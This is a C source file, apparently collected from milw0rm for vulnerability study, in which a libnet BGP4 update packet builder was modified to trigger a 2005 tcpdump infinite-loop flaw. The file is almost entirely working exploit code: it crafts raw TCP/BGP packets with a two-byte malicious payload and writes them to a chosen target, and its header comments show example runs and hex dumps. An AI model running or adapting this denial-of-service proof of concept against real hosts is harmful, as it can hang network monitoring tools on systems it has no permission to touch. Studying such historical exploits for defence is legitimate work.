lilbool/vuln-code-analysis
0
1/*
2* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite
3* loop vulnerability.
4*
5* libnet 1.1
6* Build a BGP4 update message with what you want as payload
7*
8* Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization>
9* All rights reserved.
10*
11* Examples:
12*
13* empty BGP UPDATE message:
14*
15* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2
16* libnet 1.1 packet shaping: BGP4 update + payload[raw]
17* Wrote 63 byte TCP packet; check the wire.
18*
19* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
20* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)
21* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....
22* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
23* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............
24* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............
25*
26*
27* BGP UPDATE with Path Attributes and Unfeasible Routes Length
28*
29* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13
30* libnet 1.1 packet shaping: BGP4 update + payload[raw]
31* Wrote 79 byte TCP packet; check the wire.
32*
33* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
34* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)
35* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....
36* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
37* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............
38* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA
39* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....
40*
41*
42* BGP UPDATE with Reachability Information
43*
44* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7
45* libnet 1.1 packet shaping: BGP4 update + payload[raw]
46* Wrote 70 byte TCP packet; check the wire.
47*
48* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]
49* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)
50* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....
51* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........
52* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........
53* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C
54* 0x0040 4343 4343 4343 CCCCCC
55*
56*
57* Redistribution and use in source and binary forms, with or without
58* modification, are permitted provided that the following conditions
59* are met:
60* 1. Redistributions of source code must retain the above copyright
61* notice, this list of conditions and the following disclaimer.
62* 2. Redistributions in binary form must reproduce the above copyright
63* notice, this list of conditions and the following disclaimer in the
64* documentation and/or other materials provided with the distribution.
65*
66* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
67* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
68* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
69* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
70* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
71* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
72* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
73* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
74* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
75* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
76* SUCH DAMAGE.
77*
78*/
79
80/* #if (HAVE_CONFIG_H) */
81/* #include "../include/config.h" */
82/* #endif */
83/* #include "./libnet_test.h" */
84#include <libnet.h>
85
86void
87usage(char *name);
88
89
90#define set_ptr_and_size(ptr, size, val, flag) \
91if (size && !ptr) \
92{ \
93ptr = (u_char *)malloc(size); \
94if (!ptr) \
95{ \
96printf("memory allocation failed (%u bytes requested)\n", size); \
97goto bad; \
98} \
99memset(ptr, val, size); \
100flag = 1; \
101} \
102\
103if (ptr && !size) \
104{ \
105size = strlen(ptr); \
106}
107
108
109
110int
111main(int argc, char *argv[])
112{
113int c;
114libnet_t *l;
115u_long src_ip, dst_ip, length;
116libnet_ptag_t t = 0;
117char errbuf[LIBNET_ERRBUF_SIZE];
118int pp;
119u_char *payload = NULL;
120u_long payload_s = 0;
121u_char marker[LIBNET_BGP4_MARKER_SIZE];
122
123u_short u_rt_l = 0;
124u_char *withdraw_rt = NULL;
125char flag_w = 0;
126u_short attr_l = 0;
127u_char *attr = NULL;
128char flag_a = 0;
129u_short info_l = 0;
130u_char *info = NULL;
131char flag_i = 0;
132
133printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");
134
135/*
136* Initialize the library. Root priviledges are required.
137*/
138l = libnet_init(
139LIBNET_RAW4, /* injection type */
140NULL, /* network interface */
141errbuf); /* error buffer */
142
143if (l == NULL)
144{
145fprintf(stderr, "libnet_init() failed: %s", errbuf);
146exit(EXIT_FAILURE);
147}
148
149src_ip = 0;
150dst_ip = 0;
151memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
152memset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE);
153
154while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)
155{
156switch (c)
157{
158/*
159* We expect the input to be of the form `ip.ip.ip.ip.port`. We
160* point cp to the last dot of the IP address/port string and
161* then seperate them with a NULL byte. The optarg now points to
162* just the IP address, and cp points to the port.
163*/
164case 'd':
165if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
166{
167fprintf(stderr, "Bad destination IP address: %s\n", optarg);
168exit(EXIT_FAILURE);
169}
170break;
171
172case 's':
173if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
174{
175fprintf(stderr, "Bad source IP address: %s\n", optarg);
176exit(EXIT_FAILURE);
177}
178break;
179
180case 'p':
181payload = optarg;
182payload_s = strlen(payload);
183break;
184
185case 'w':
186withdraw_rt = optarg;
187break;
188
189case 'W':
190u_rt_l = atoi(optarg);
191break;
192
193case 'a':
194attr = optarg;
195break;
196
197case 'A':
198attr_l = atoi(optarg);
199break;
200
201case 'i':
202info = optarg;
203break;
204
205case 'I':
206info_l = atoi(optarg);
207break;
208
209default:
210exit(EXIT_FAILURE);
211}
212}
213
214if (!src_ip || !dst_ip)
215{
216usage(argv[0]);
217goto bad;
218}
219
220set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);
221set_ptr_and_size(attr, attr_l, 0x42, flag_a);
222set_ptr_and_size(info, info_l, 0x43, flag_i);
223
224/*
225* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump
226* infinite loop vulnerability.
227*/
228if (payload == NULL) {
229if ((payload = malloc(16)) == NULL) {
230fprintf(stderr, "Out of memory\n");
231exit(1);
232}
233pp = 0;
234payload[pp++] = 0;
235payload[pp++] = 33;
236payload_s = pp;
237}
238
239/*
240* BGP4 update messages are "dynamic" are fields have variable size. The only
241* sizes we know are those for the 2 first fields ... so we need to count them
242* plus their value.
243*/
244length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;
245t = libnet_build_bgp4_update(
246u_rt_l, /* Unfeasible Routes Length */
247withdraw_rt, /* Withdrawn Routes */
248attr_l, /* Total Path Attribute Length */
249attr, /* Path Attributes */
250info_l, /* Network Layer Reachability Information length */
251info, /* Network Layer Reachability Information */
252payload, /* payload */
253payload_s, /* payload size */
254l, /* libnet handle */
2550); /* libnet id */
256if (t == -1)
257{
258fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));
259goto bad;
260}
261
262length+=LIBNET_BGP4_HEADER_H;
263t = libnet_build_bgp4_header(
264marker, /* marker */
265length, /* length */
266LIBNET_BGP4_UPDATE, /* message type */
267NULL, /* payload */
2680, /* payload size */
269l, /* libnet handle */
2700); /* libnet id */
271if (t == -1)
272{
273fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
274goto bad;
275}
276
277length+=LIBNET_TCP_H;
278t = libnet_build_tcp(
2790x6666, /* source port */
280179, /* destination port */
2810x01010101, /* sequence number */
2820x02020202, /* acknowledgement num */
283TH_SYN, /* control flags */
28432767, /* window size */
2850, /* checksum */
2860, /* urgent pointer */
287length, /* TCP packet size */
288NULL, /* payload */
2890, /* payload size */
290l, /* libnet handle */
2910); /* libnet id */
292if (t == -1)
293{
294fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
295goto bad;
296}
297
298length+=LIBNET_IPV4_H;
299t = libnet_build_ipv4(
300length, /* length */
3010, /* TOS */
302242, /* IP ID */
3030, /* IP Frag */
30464, /* TTL */
305IPPROTO_TCP, /* protocol */
3060, /* checksum */
307src_ip, /* source IP */
308dst_ip, /* destination IP */
309NULL, /* payload */
3100, /* payload size */
311l, /* libnet handle */
3120); /* libnet id */
313if (t == -1)
314{
315fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
316goto bad;
317}
318
319/*
320* Write it to the wire.
321*/
322c = libnet_write(l);
323if (c == -1)
324{
325fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
326goto bad;
327}
328else
329{
330fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
331}
332
333if (flag_w) free(withdraw_rt);
334if (flag_a) free(attr);
335if (flag_i) free(info);
336
337libnet_destroy(l);
338return (EXIT_SUCCESS);
339bad:
340if (flag_w) free(withdraw_rt);
341if (flag_a) free(attr);
342if (flag_i) free(info);
343
344libnet_destroy(l);
345return (EXIT_FAILURE);
346}
347
348void
349usage(char *name)
350{
351fprintf(stderr,
352"usage: %s -s source_ip -d destination_ip \n"
353" [-m marker] [-p payload] [-S payload size]\n"
354" [-w Withdrawn Routes] [-W Unfeasible Routes Length]\n"
355" [-a Path Attributes] [-A Attribute Length]\n"
356" [-i Reachability Information] [-I Reachability Information length]\n",
357name);
358}
359
360// milw0rm.com [2005-06-09]